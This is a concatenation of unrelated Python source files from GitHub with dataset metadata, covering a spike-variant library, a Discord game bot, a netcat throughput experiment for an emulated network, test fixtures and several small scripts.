# chr()\n","repo_name":"BoxDogRu/python-bot-ai","sub_path":"modul_1/veb10_text_filters_dz2/simple_filters.py","file_name":"simple_filters.py","file_ext":"py","file_size_in_byte":3223,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23579043321","text":"\ndef solve():\n D, N = [int(x) for x in input().strip().split()]\n t = 0\n for i in range(N):\n K, S = [int(x) for x in input().strip().split()]\n t = max( (D - K)/S, t)\n return D/t\n\nt = int(input())\nfor i in range(t):\n ans = solve()\n print(\"Case #%d: %f\" %(i+1, ans))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_206/142.py","file_name":"142.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4761452234","text":"'''\nlibrary of routines for spike variants\n'''\nimport re\nfrom collections import Counter\nfrom functools import lru_cache\nimport warnings\n\nimport intlist\nimport mutant\nimport colornames\ntry:\n from defaultspikevars import \\\n get_mstrings, get_colors, get_names\nexcept ImportError:\n warnings.warn(\"Cannot import defaultspikevars.py -- well, maybe we won't need it\")\n\n## VOC (variant of concern) is basically a Mutation but with also a color and a name\n\nclass VOC(mutant.Mutation):\n '''VOC = Variant Of Concern = Mutation() with color and name '''\n def __init__(self,m,c,n):\n super().__init__(m)\n self.color=c\n self.name=n\n\n def __hash__(self):\n return hash(tuple((self.as_string(),self.color,self.name)))\n\ndef read_colormut_fp(colormutfileptr):\n ''' yields VOC's from lines of the fileptr '''\n for line in colormutfileptr:\n line = re.sub(\"#.*\",\"\",line).strip()\n if not line:\n #ignore empty and commented-out lines\n continue\n\n ## Match: Color [Mutation]! Name, with \"!\" optional\n m = re.match(r'(\\S+)\\s+(\\[.*\\])(!?)\\s*(\\S*).*',line)\n if not m:\n warnings.warn(f\"No match: {line}\")\n continue\n color = m[1].strip()\n try:\n color = colornames.tohex(color)\n except KeyError:\n raise RuntimeError(f\"Invalid color: {color}\")\n\n mstring = m[2]+m[3]\n name = m[4]\n yield VOC(mstring,color,name)\n\n\nclass SpikeVariants():\n '''Variants of Spike protein'''\n #mostly, this is a list of VOCS\n ## Hmmm, wonder if this could be a child of the MutationManager class???\n\n OTHERNAME=\"other\"\n OTHERCOLOR='#dddddd'\n\n def __init__(self, vocs=None, refseq=None):\n if vocs:\n self.init_from_vocs(vocs,refseq=refseq)\n\n @property\n def mstrings(self):\n return [v.as_string() for v in self.vocs]\n\n @property\n def colors(self):\n return [v.color for v in self.vocs]\n\n @property\n def names(self):\n return [v.name for v in self.vocs]\n\n @classmethod\n def default(cls,refseq=None):\n return cls().init_from_defaults(refseq=refseq)\n\n @classmethod\n def from_colormut(cls,colormutfile,refseq=None):\n return cls().init_from_colormut(colormutfile,refseq=refseq)\n\n def init_from_defaults(self,refseq=None):\n mstrings = get_mstrings()\n colors = get_colors()\n names = get_names()\n self.init_from_vocs((VOC(m,c,n)\n for m,c,n in zip(mstrings,colors,names)),\n refseq=refseq)\n return self\n\n def init_from_colormut(self,colormutfile,refseq=None):\n '''initialize from color muation table file'''\n with open(colormutfile) as fp:\n return self.init_from_fp(fp,refseq=refseq)\n\n def init_from_fp(self,fp,refseq=None):\n '''initialize from file pointer'''\n return self.init_from_vocs(read_colormut_fp(fp),\n refseq=refseq)\n\n def init_from_vocs(self,vocs,refseq=None):\n '''initialize from list of VOC items'''\n self.vocs = list(vocs)\n\n ## union of sites that appear in all the different mstrings\n sites=set()\n for voc in self.vocs:\n sites.update(ssm.site for ssm in voc)\n self.sites = list(sorted(sites))\n\n # nb, if no insertions then xtrachars=0 for all sites\n xtrachars = {site: 0 for site in sites}\n for voc in self.vocs:\n for ssm in voc:\n if ssm.ref == '+':\n xtrachars[ssm.site] = max([xtrachars[ssm.site],\n len(ssm.mut)])\n self.xtrachars = xtrachars ## a handy data structure to keep around\n\n ## if refseq=None, this will still make a /plausible/ refseq\n ## if we later run set_refseq on a real refseq, then we can get a better one\n self.set_refseq(refseq)\n \n return self\n\n def set_refseq(self,refseq):\n '''continue initialization using refseq'''\n\n if not refseq:\n ## then make a pseudo-refseq, consistent with actual refseq\n ## at all sites specified in all the mutations\n ## and \"x\" everywhere else\n warnings.warn(\"I don't trust this not-specifying of refseq\")\n\n refseq = []\n for losite,hisite in zip([0]+self.sites[:-1],self.sites):\n refseq.extend(['x']*(hisite-losite) +\n ['-']*self.xtrachars[hisite])\n\n T = mutant.SiteIndexTranslator(refseq)\n for voc in self.vocs:\n for ssm in voc:\n ndx = T.index_from_site(ssm.site)\n if refseq[ndx] in '+x':\n refseq[ndx] = ssm.ref\n refseq = \"\".join(refseq)\n\n self.refseq = refseq\n self.MM = mutant.MutationManager(refseq)\n self.master = self.shorten(refseq)\n return self\n\n @lru_cache(maxsize=None)\n def vocmatch(self,seq):\n '''return list of voc patterns that match the sequence'''\n ## ideally, length of that list is 1 or 0\n return [voc for voc in self.vocs\n if self.MM.seq_fits_pattern(voc,seq)]\n\n def shorten(self,seq):\n shortseq = []\n for site in self.sites:\n ndx = self.MM.index_from_site(site)\n shortseq.append(seq[ndx:ndx+1+self.xtrachars[site]])\n return \"\".join(shortseq)\n\n def flatpattern(self,voc):\n flatpatt = self.MM.pattern_from_mutation(voc)\n flatpatt = self.relpattern(flatpatt,self.refseq)\n flatpatt = self.shorten(flatpatt)\n return flatpatt\n\n def relpattern(self,seq,refseq,dittochar='_'):\n ## note, self not actually needed; this routine could stand alone\n ## ORRR ... we could use self's idea of what refseq is\n ## except that sometimes want to use master instead of refseq\n rseq = [dittochar if (s==r and r not in \"-\") else s\n for s,r in zip(seq,refseq)]\n return \"\".join(rseq)\n\n\n def check(self):\n Ls = len(self.ssites())\n if self.refseq:\n Lm = len(self.master)\n if Ls != Lm:\n raise RuntimeError(f\"ssites:{Ls} != {Lm}=len({self.master})\")\n for v in self.vocs:\n shortpatt = self.shorten(v.pattern(self.refseq))\n Lp = len(shortpatt)\n if Lp != Lm:\n raise RuntimeError(f\"{str(v)} => {shortpatt}; len={Lp} != {Lm}\")\n\n def checkmaster(self,refseq):\n '''broken!''' ## Have we decided what 'master' even is, yet?\n if len(self.refseq) != len(refseq):\n print(f\"checkmaster: unequal lengths {len(self.refseq)} != {len(refseq)}\")\n return\n for n,(m,r) in enumerate(zip(self.refseq,refseq)):\n if m!=r and m!='x':\n print(n,m,r)\n raise RuntimeError(\"checkmaster fail\")\n\n def ssites(self):\n ''' list self.sites but with repeats for insertions '''\n ss = []\n for site in self.sites:\n ss.extend([site]*(1+self.xtrachars[site]))\n return ss\n\n def less_exact(self):\n '''\n redefine the \"exact\" matches to only be exact\n over the common sites in the list of vocs\n '''\n allsites = self.sites\n for voc in self.vocs:\n if not voc.exact:\n continue\n vocsites = set(ssm.site for ssm in voc)\n for site in set(allsites)-vocsites:\n ref = self.refseq[self.MM.index_from_site(site)]\n voc.append( mutant.SingleSiteMutation((ref,site,ref)) )\n voc.exact=False\n voc.sort()\n\n\n\n def pprint(self,**kwxtra):\n print(\"\\n\".join( intlist.write_numbers_vertically(self.ssites()) ),**kwxtra)\n print(self.master,\"Master\",**kwxtra)\n for v in self.vocs:\n shortpatt = self.shorten(v.pattern(self.refseq))\n #print(shortpatt,v.name,\"shortpatt\",**kwxtra)\n newshortpatt = self.relpattern(shortpatt,self.master)\n print(newshortpatt,v.name,str(v),**kwxtra)\n\n ## Q: should all of this key view stuff get moved to mkkeyfile.py ?\n\n def key_view1(self):\n ''' pattern variant '''\n\n namelen = max(len(v.name) for v in self.vocs)\n fmt = \"%%s %%-%ds %%s\" % namelen\n lines = intlist.write_numbers_vertically(self.ssites())\n white = \"#FFFFFF\"\n tic = \" \"\n for line in lines:\n yield fmt % (white,tic,line)\n yield fmt % (white,tic,self.master)\n yield fmt % (self.OTHERCOLOR,self.OTHERNAME,\n \".\"*len(self.master))\n for v in self.vocs[::-1]:\n flatpatt = self.flatpattern(v)\n yield fmt % (v.color,v.name,flatpatt)\n\n def key_view2(self):\n ''' mutation string variant '''\n namelen = max(len(v.name) for v in self.vocs)\n fmt = \"%%s %%-%ds %%s\" % (namelen,)\n yield fmt % (self.OTHERCOLOR,self.OTHERNAME,\"\")\n for v in self.vocs[::-1]:\n yield fmt % (v.color,v.name,v.as_string())\n\n def key_view3(self,seqs):\n ''' most-common sequence m-string for each variant '''\n namelen = max(len(v.name) for v in self.vocs)\n fmt = \"%%s %%-%ds %%s\" % (namelen,)\n yield fmt % (self.OTHERCOLOR,self.OTHERNAME,\"\")\n seq_counter = dict()\n for v in self.vocs:\n seq_counter[v] = Counter()\n for s in seqs:\n for v in self.vocmatch(s.seq):\n seq_counter[v][s.seq] += 1\n for v in self.vocs[::-1]:\n z = seq_counter[v].most_common(1)\n if len(z):\n [(seq,_)] = z[:1]\n mstring = str(self.MM.get_mutation(seq))\n else:\n mstring = \"\"\n continue ## don't put empty mstrings into key\n yield fmt % (v.color,v.name,mstring)\n\n def key_view(self,view,seqs=None):\n '''get lines to be printed for keyfile'''\n assert view in [1,2,3]\n if view == 1:\n keylines = self.key_view1()\n elif view == 2:\n keylines = self.key_view2()\n elif view == 3:\n keylines = self.key_view3(seqs)\n return keylines\n\n def key_print(self,view,seqs=None,**kwxtra):\n '''print a keyfile '''\n for line in self.key_view(view,seqs=seqs):\n print(line,**kwxtra)\n\n def pyprint(self,fileptr):\n ''' writes python code to define functions:\n get_mstrings(), get_colors(), get_names()\n based on the current stuctures in SpikeVariants\n '''\n def fprint(*p,**kw):\n print(*p,file=fileptr,**kw)\n\n def fprint_item(name,array,quoted=True):\n fprint(f\"def get_{name}():\")\n fprint(f\" {name} = [\")\n for item in array:\n if quoted:\n fprint(f\" '{item}',\")\n else:\n fprint(f\" {item},\")\n fprint(f\" ]\")\n fprint(f\" return {name}\")\n fprint()\n\n fprint(\"# Default spike variants\")\n fprint_item(\"mstrings\",self.mstrings,quoted=True)\n fprint_item(\"colors\",self.colors,quoted=True)\n fprint_item(\"names\",self.names,quoted=True)\n\n fprint(\"if __name__ == '__main__':\")\n fprint(\" import spikevariants\")\n fprint(\" mstrings = get_mstrings()\")\n fprint(\" colors = get_colors()\")\n fprint(\" names = get_names()\")\n fprint(\" vocs = [spikevariants.VOC(m,c,n)\")\n fprint(\" for m,c,n in zip(mstrings,colors,names)]\")\n fprint(\" svar = spikevariants.SpikeVariants().init_from_vocs(vocs)\")\n fprint(\" svar.pprint()\")\n\n\nif __name__ == \"__main__\":\n\n import sys\n\n sv = SpikeVariants.default()\n sv.set_refseq(None)\n sv.check() ## doesn't make sense without refseq!!\n sv.pprint(file=sys.stderr)\n\n sv = SpikeVariants.from_colormut(\"color-mutation-table-v4.txt\")\n sv.set_refseq(None)\n sv.check()\n sv.pprint(file=sys.stderr)\n\n sv.key_print(2,file=sys.stderr)\n\n sv.pyprint(sys.stdout)\n","repo_name":"jt-lanl/cov-voc","sub_path":"spikevariants.py","file_name":"spikevariants.py","file_ext":"py","file_size_in_byte":12209,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"75229611394","text":"\nimport pandas as pd\nimport numpy as np\nimport argparse\n\n\ndef load_dfs(tsv_paths):\n\n result = [] \n for tsv_p in tsv_paths:\n df = pd.read_csv(tsv_p, sep=\"\\t\")\n df.set_index([\"pA\",\"pB\"], inplace=True)\n result.append(df)\n\n return result \n\n\ndef combine_dfs(df_ls, identifiers, score_cols):\n\n multicolumns = [(col, ident) for col in score_cols for ident in identifiers]\n\n combined = pd.DataFrame(index=df_ls[0].index,\n columns=pd.MultiIndex.from_tuples(multicolumns))\n\n for col in score_cols:\n for (ident, df) in zip(identifiers, df_ls):\n print(\"\\t\", ident)\n combined[(col,ident)] = df[col] \n\n return combined\n\n\ndef compute_z_scores(df, identifiers, z_cols, baseline=\"traditional\"):\n\n for zcol in z_cols:\n for method in identifiers:\n df[(zcol+\"_z\", method)] = (df[(zcol,method)] - df[(zcol,baseline)])/np.sqrt( df[(zcol+\"_var\",method)]/df[(\"pat\",method)] + df[(zcol+\"_var\",baseline)]/df[(\"pat\",baseline)] )\n\n return df\n\n\nif __name__==\"__main__\":\n\n \n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--score_tsvs\", help=\"TSV files containing scores\", nargs=\"+\")\n parser.add_argument(\"--identifiers\", help=\"string identifiers of trial designs\", nargs=\"+\")\n parser.add_argument(\"--output_tsv\", type=str, help=\"output TSV file\")\n parser.add_argument(\"--score_cols\", type=str, nargs=\"+\", default=[\"pat\", \"cmh_reject\", \"cmh_reject_h\", \"obf_reject\", \"obf_stopped_early\", \"cmh_2s\", \"nA-nB_norm\", \"nA-nB_norm_h\", \"nA-nB\", \"nA-nB_h\", \"nA-nB_05\", \"nA-nB_95\", \"effect_estimate\", \"effect_bias\", \"effect_bias_h\", \"A_fraction\", \"failures\", \"excess_failures\", \"blocks\", \"first_blocksize\", \"utility_cmh\"])\n parser.add_argument(\"--z_cols\", type=str, nargs=\"+\", default=[\"cmh_reject\", \"excess_failures\", \"nA-nB_norm\", \"utility_cmh\"])\n args = parser.parse_args()\n\n score_cols = args.score_cols + [col+\"_var\" for col in args.z_cols]\n \n dfs = load_dfs(args.score_tsvs)\n\n table = combine_dfs(dfs, args.identifiers, score_cols)\n\n table = compute_z_scores(table, args.identifiers, args.z_cols)\n\n table.to_excel(args.output_tsv) #, sep=\"\\t\", index=True)\n\n","repo_name":"dpmerrell/TrialMDP-analyses","sub_path":"scripts/tabulate_comparisons.py","file_name":"tabulate_comparisons.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23961776523","text":"import asyncio\nimport os\nimport random\nimport string\nfrom threading import Thread\n\nimport discord\nfrom dotenv import load_dotenv\nfrom discord.ext import commands\n\nfrom components.GameSession import GameSession, sessions, sessiontime_decrease\nfrom views.gameplay_view import GameplayView\nfrom views.help_view import HelpView\nfrom views.join_view import JoinView\n\nload_dotenv()\nintents = discord.Intents.default()\nintents.message_content = True\nbot = commands.Bot(command_prefix=\"rush!\", intents=intents, help_command=None)\n\n@bot.event\nasync def on_timeout(message: discord.Message, game):\n await message.edit(embed=game.create_message(), view=GameplayView(game))\n\n@bot.event\nasync def on_session_terminated(u, k, c):\n user = await bot.fetch_user(u)\n await c.delete()\n del sessions[k]\n print(user)\n await user.send(\"Your session was terminated because no one joined\")\n\n\n@bot.event\nasync def on_guild_join(guild: discord.Guild):\n channel = guild.text_channels[0]\n embed = discord.Embed(title=\"Hi! :wave:\",\n description=\"\"\"Thanks for adding me!\n I'm just your friendly discord bot that let's you play this game called **LUCKY RUSH**\n Although that's my main purpose, I have __**MUCH MORE**__ to offer. So type `rush!help` to see all commands\n \"\"\")\n await channel.send(embed=embed)\n\n\n@bot.event\nasync def on_message(message):\n await bot.process_commands(message)\n\n\n@bot.event\nasync def on_ready():\n await bot.tree.sync()\n for i in bot.guilds:\n for y in i.text_channels:\n if \"luckyrush\" in y.name:\n await y.delete()\n\n\n@bot.hybrid_command(description=\"Display rules for Lucky Rush\")\nasync def rules(ctx):\n print(\"xxx\")\n embed = discord.Embed(title=\"Rules\", description=\"\"\"\n **GOAL:** Be the first person on the finish line\n\n -----------\n\n The game is divided on rounds. In each round you must pick, if\n you want to **CHECK** the luckybox or **PASS** it.\n Each luckybox contains many fortunate (and unfortunate) stuff that can help you win (or lose) the game.\n In rounds 5 and 10, you have to check the box sadly.\n The game is played with 3 other players\n \"\"\", colour=discord.Colour.blue())\n\n embed.set_footer(text=f\"Sent in {int(round(bot.latency, 3) * 1000)}ms\")\n await ctx.send(embed=embed)\n\n\n@bot.hybrid_command(name=\"help\", description=\"View all possible commands\")\nasync def helpme(ctx: discord.TextChannel):\n embed = discord.Embed(title=f\"Help - Page 1\")\n embed.add_field(name=\"help\", value=\"Shows all of commands\", inline=False)\n embed.add_field(name=\"rules\", value=\"Shows rules of the Lucky Rush\", inline=False)\n embed.add_field(name=\"start\", value=\"Starts a new game\", inline=False)\n embed.add_field(name=\"join\", value=\"Join a game via code\", inline=False)\n embed.add_field(name=\"gameopt\", value=\"Set options of the game\", inline=False)\n embed.set_footer(text=\"Prefix: rush!\")\n\n await ctx.send(embed=embed, view=HelpView())\n\n\n@bot.hybrid_command(description=\"Get an invite link (if you couldn't just go to my profile lol)\")\nasync def invite(ctx):\n await ctx.send(\"Here's my invite link: \")\n\n\n@bot.hybrid_command(description=\"Get a link to my github (if you couldn't open my about me section lol)\")\nasync def github(ctx):\n await ctx.send(\"Want to contribute? Sure, here's my github: \")\n\n\n@bot.hybrid_command(description=\"Start a new lobby for Lucky Rush\")\nasync def lobby(ctx):\n code = ''.join(random.choices(string.ascii_lowercase, k=10))\n while True:\n if code in sessions:\n code = ''.join(random.choices(string.ascii_lowercase, k=10))\n else:\n break\n\n embed = discord.Embed(title=\"Waiting for players...\", description=f\"\"\"\n Invite some friends with this code: {code}\n \"\"\")\n embed.colour = discord.Colour.gold()\n\n guild: discord.Guild = ctx.guild\n c = await guild.create_text_channel(f\"luckyrush-{len(sessions)}\")\n sessions[code] = GameSession(bot, ctx.author, guild, c)\n await c.send(embed=embed)\n await c.set_permissions(guild.default_role, overwrite=discord.PermissionOverwrite(\n view_channel=False\n ))\n await c.set_permissions(ctx.author, overwrite=discord.PermissionOverwrite(\n view_channel=True\n ))\n\n\n@bot.hybrid_command(description=\"Join to the Lucky Rush lobby via code\")\nasync def join(ctx):\n await ctx.send(view=JoinView())\n\n\n@bot.hybrid_command(description=\"Leave the lobby you're currently in\")\nasync def leave(ctx):\n for i in sessions.values():\n if ctx.author in i.players:\n await i.leave(ctx.author)\nt = Thread(target=sessiontime_decrease, args=[bot], daemon=True)\nt.start()\nbot.run(os.getenv(\"TOKEN\"))\n\n\n","repo_name":"OvieDev/lucky-rush","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4864,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"35857311475","text":"from utils.utils import get_tags\n\n\ndef f1_score(tar_path, pre_path, tag, tag_map):\n origin = 0.\n found = 0.\n right = 0.\n for fetch in zip(tar_path, pre_path):\n tar, pre = fetch\n tar_tags = get_tags(tar, tag, tag_map)\n pre_tags = get_tags(pre, tag, tag_map)\n\n origin += len(tar_tags)\n found += len(pre_tags)\n\n for p_tag in pre_tags:\n if p_tag in tar_tags:\n right += 1\n\n recall = 0. if origin == 0 else (right / origin)\n precision = 0. if found == 0 else (right / found)\n f1 = 0. if recall + precision == 0 else (2 * precision * recall) / (precision + recall)\n return recall, precision, f1\n","repo_name":"AlieZVzz/Pytorch_NER_Template","sub_path":"metrics/ner_f1.py","file_name":"ner_f1.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14557644124","text":"file = open(\"gra.txt\", \"r\")\r\ntable = []\r\n\r\nimport os\r\n\r\nfor wiersz in file:\r\n wiersz = wiersz.strip()\r\n row = []\r\n for letter in wiersz:\r\n row.append(letter)\r\n table.append(row)\r\n\r\n\r\n\r\ndef ile_sasiadow(x, y, table):\r\n status = \"\"\r\n if table[y][x] == \"X\":\r\n status = \"alive\"\r\n elif table[y][x] == \".\":\r\n status = \"dead\"\r\n sasiedzi = 0\r\n for j in range(y - 1, y + 2):\r\n word = \"\"\r\n for i in range(x - 1, x + 2):\r\n if i == 20 and j == 12:\r\n word += table[0][0]\r\n continue\r\n if i == 20:\r\n word += table[j][0]\r\n continue\r\n if j == 12:\r\n word += table[0][i]\r\n continue\r\n\r\n if i != x or j != y:\r\n word += table[j][i]\r\n # print(word)\r\n for letter in word:\r\n if letter == \"X\":\r\n sasiedzi += 1\r\n return sasiedzi, status\r\n\r\n\r\ndef evolve(table):\r\n pass\r\n evolution = []\r\n for i in range(len(table)):\r\n evo_row = []\r\n for j in range(len(table[0])):\r\n # print(table[i][j])\r\n if ile_sasiadow(j, i, table)[1] == \"alive\" and ile_sasiadow(j, i, table)[0] in (2, 3):\r\n evo_row.append(\"X\")\r\n continue\r\n elif ile_sasiadow(j, i, table)[1] == \"dead\" and ile_sasiadow(j, i, table)[0] == 3:\r\n evo_row.append(\"X\")\r\n continue\r\n else:\r\n evo_row.append(\".\")\r\n evolution.append(evo_row)\r\n\r\n return evolution\r\n\r\n\r\nfor i in range(2, 100):\r\n print(\"Pokolenie\", i)\r\n table = evolve(table)\r\n for row in table:\r\n print(row)\r\n clear_screen()\r\n\r\nimport sys, pygame\r\n\r\nsize = width, height = 401,401\r\nblack = 0,0,0\r\nwhite = 200,200,200\r\n\r\nscreen = pygame.display.set_mode(size)\r\nblock_size = 2\r\ngameLoop = True\r\ntab = [[\"\" for i in range(20)] for j in range(20)]\r\nfor x in tab:\r\n print(x)\r\nwhile gameLoop:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n sys.exit()\r\n\r\n j = 1\r\n for y in tab:\r\n i = 1\r\n for x in y:\r\n pygame.draw.rect(screen, white, [i, j, 19, 19])\r\n i += 20\r\n j +=20\r\n pygame.display.flip()\r\n\r\n\r\n","repo_name":"artpods56/Matura-Informatyka-Python","sub_path":"2016 Maj - Stare Rozszerzenie/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14883892645","text":"from core.experiment import Experiment, ExperimentParameter\n\n\"\"\"\nShould be the mother of ExperimentNCPV, shame on me, should rewrite\nExperimentNCPV as daughter class of this one.\n\"\"\"\n\nclass NCParameter(ExperimentParameter):\n DD_IBS = \"ddIBS\"\n DD_OBS = \"ddIBS\"\n DD_COUNT = \"ddCount\"\n SERVER_PORT = \"ncServerPort\"\n CLIENT_PORT = \"ncClientPort\"\n\n def __init__(self, experiment_parameter_filename):\n super(NCParameter, self).__init__(experiment_parameter_filename)\n self.default_parameters.update({\n NCParameter.DD_IBS: \"1k\",\n NCParameter.DD_OBS: \"1k\",\n NCParameter.DD_COUNT: \"5000\", #5k * 1k = 5m\n NCParameter.SERVER_PORT: \"33666\",\n NCParameter.CLIENT_PORT: \"33555\",\n })\n \n\nclass NC(Experiment):\n NAME = \"nc\"\n PARAMETER_CLASS = NCParameter\n\n SERVER_NC_LOG = \"netcat_server\"\n CLIENT_NC_LOG = \"netcat_client\"\n NC_BIN = \"netcat\"\n\n def __init__(self, experiment_parameter_filename, topo, topo_config):\n super(NC, self).__init__(experiment_parameter_filename, topo, topo_config)\n self.load_parameters()\n \n def load_parameters(self):\n self.ddibs = self.experiment_parameter.get(NCParameter.DD_IBS)\n self.ddobs = self.experiment_parameter.get(NCParameter.DD_OBS)\n self.ddcount = self.experiment_parameter.get(NCParameter.DD_COUNT)\n self.ncServerPort = self.experiment_parameter.get(NCParameter.SERVER_PORT)\n self.ncClientPort = []\n for k in sorted(self.experiment_parameter.paramDic):\n if k.startswith(NCParameter.CLIENT_PORT):\n port = self.experiment_parameter.paramDic[k]\n self.ncClientPort.append(port)\n if len(self.ncClientPort) == 0:\n d = self.experiment_parameter.get(NCParameter.CLIENT_PORT)\n self.ncClientPort.append(d)\n\n def prepare(self):\n super(NC, self).prepare()\n self.topo.command_to(self.topo_config.client, \"rm \" + \\\n NC.CLIENT_NC_LOG )\n self.topo.command_to(self.topo_config.server, \"rm \" + \\\n NC.SERVER_NC_LOG )\n\n def getNCServerCmd(self, id):\n s = \"dd if=/dev/urandom ibs=\" + self.ddibs + \\\n \" obs=\" + self.ddobs + \\\n \" count=\" + self.ddcount + \\\n \" | \" + \\\n NC.NC_BIN + \\\n \" -l \" + self.ncServerPort + \\\n \" &>\" + NC.SERVER_NC_LOG + \\\n \"_\" + str(id) + \".log\"\n print(s)\n return s\n\n def getNCClientCmd(self, id):\n s = NC.NC_BIN + \" \" + \\\n \" -p \" + self.ncClientPort[id] + \" \" + \\\n self.topo_config.get_server_ip() + \" \" + \\\n self.ncServerPort + \" \" + \\\n \"&>\" + NC.CLIENT_NC_LOG + \\\n \"_\" + str(id) + \".log\"\n print(s)\n return s\n\n def clean(self):\n super(NC, self).clean()\n self.topo.command_to(self.topo_config.server, \"killall netcat\")\n\n def run(self):\n for i in range(0, len(self.ncClientPort)):\n cmd = self.getNCServerCmd(i)\n self.topo_config.server.sendCmd(cmd)\n \n cmd = self.getNCClientCmd(i)\n self.topo.command_to(self.topo_config.client, cmd)\n\n self.topo_config.server.waitOutput()\n \n self.topo.command_to(self.topo_config.client, \"sleep 1\")\n\n","repo_name":"qdeconinck/minitopo","sub_path":"experiments/nc.py","file_name":"nc.py","file_ext":"py","file_size_in_byte":3413,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"28529681541","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Tests for the segmentation subpackage.\"\"\"\n\n# import nose\nimport tests.testhelper as testhelper\n\n# hwrt modules\nimport hwrt.segmentation as segmentation\n# import hwrt.utils as utils\n\n\n# Tests\ndef prepare_beams():\n \"\"\"\n Prepare one beam object for each recording.\n\n Returns\n -------\n list\n A list of beam objects\n \"\"\"\n beams = []\n hwrs = testhelper.get_all_symbols_as_handwriting()\n for hwr in hwrs:\n beam = segmentation.Beam()\n for stroke in hwr.get_sorted_pointlist():\n beam.add_stroke(stroke)\n beams.append(beam)\n return beams\n\n\ndef get_results_test():\n \"\"\"Test the .get_results() method of beam objects.\"\"\"\n beams = prepare_beams()\n for beam in beams:\n beam.get_results()\n\n\ndef get_writemath_results_test():\n \"\"\"Test the .get_writemath_results method of beam objects.\"\"\"\n beams = prepare_beams()\n for beam in beams:\n beam.get_writemath_results()\n\n\n# def p_strokes_test():\n# nose.tools.assert_greater_equal(1.0, segmentation.p_strokes('A', 3))\n# nose.tools.assert_greater_equal(segmentation.p_strokes('A', 3), 0.0)\n","repo_name":"all3xfx/hwrt","sub_path":"tests/segmentation_test.py","file_name":"segmentation_test.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"2591154784","text":"import numpy as np\n\ntribit_mgd_map = {\n 0: 0,\n 1: 1,\n 2: 3,\n 3: 2,\n 4: 7,\n 5: 6,\n 6: 4,\n 7: 5\n}\n\ndibit_mgd_map = {\n 0: 0,\n 1: 1,\n 2: 3,\n 3: 2\n}\n\n\ndef MGD_Decode(indata: np.ndarray, Bd: int = 75, frqmode: str = \"fixed\") -> np.ndarray:\n # Convert the input bitgroups to their Gray form, so that\n # receive errors only result in one bit in err.\n\n if ((Bd == 75 and frqmode == 'fixed') or Bd == 1200):\n grouped = np.zeros([indata.shape[0]//2,], dtype=int)\n for i in range(0, len(indata), 2):\n grouped[i//2] = int(str(indata[i]) + str(indata[i+1]), base=2)\n out = np.zeros(grouped.shape, dtype=int)\n for i, el in enumerate(grouped):\n out[i] = dibit_mgd_map[el]\n return out\n\n elif (Bd == 150 or Bd == 300 or Bd == 600 or (Bd == 75 and frqmode == 'hopping')):\n return indata\n\n elif (Bd == 2400 or Bd == 4800):\n grouped = np.zeros([indata.shape[0]//3,], dtype=int)\n for i in range(0, len(indata), 3):\n grouped[i//3] = int(str(indata[i]) +\n str(indata[i+1]) + str(indata[i+2]), base=2)\n out = np.zeros(grouped.shape, dtype=int)\n for i, el in enumerate(grouped):\n out[i] = tribit_mgd_map[el]\n return out\n else:\n raise RuntimeError(\"Invalid input.\")\n","repo_name":"Willt125/MIL-STD-188-110C","sub_path":"MGDDecode.py","file_name":"MGDDecode.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"24962830432","text":"import pytest\nimport json\nfrom aiohttp import web\nfrom aiohttp.test_utils import TestClient\nfrom yarl import URL\nfrom app.core import SessionMaker\nfrom app.schemas import VacancyRequest\n\n\nasync def hhru_vacancy(request: web.Request) -> web.Response:\n \"\"\"Mock hhru vacancy response\n \"\"\"\n with open('./tests/core/vac_resp.json', 'r') as f:\n data = json.loads(f.read())\n return web.Response(text=json.dumps(\n data, ensure_ascii=False), content_type='application/json'\n )\n\n\n@pytest.fixture\ndef urls() -> dict[str, str]:\n \"\"\"Urls for request\n\n Returns:\n dict[str, str]: dict with urls\n \"\"\"\n urls = {\n 'hhru_vacancy': str(URL.build(\n path='/vacancies',\n query=VacancyRequest.Config.schema_extra['example']\n ),\n )}\n return urls\n\n\n@pytest.fixture\ndef client(loop, aiohttp_client) -> TestClient:\n \"\"\"Make a test client\n \"\"\"\n app = web.Application()\n app.router.add_routes([\n web.get('/vacancies', hhru_vacancy),\n ])\n client = loop.run_until_complete(aiohttp_client(app))\n return client\n\n\n@pytest.fixture\ndef session(client: TestClient) -> SessionMaker:\n \"\"\"Make test session\n \"\"\"\n SessionMaker.aiohttp_client = client\n session = SessionMaker()\n return session\n","repo_name":"KonstantinKlepikov/wzzzz","sub_path":"api/app/tests/core/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"19192169737","text":"import PyIgnition\n\n\nclass FXFire(object):\n def __init__(self, game):\n self.game = game\n self.fire = PyIgnition.ParticleEffect(game.screen, (0, 0), (800, 600))\n self.source = self.fire.CreateSource((300, 500), initspeed=2.0, initdirection=90.0, initspeedrandrange=0.1,\n initdirectionrandrange=0.5, particlesperframe=3, particlelife=100,\n 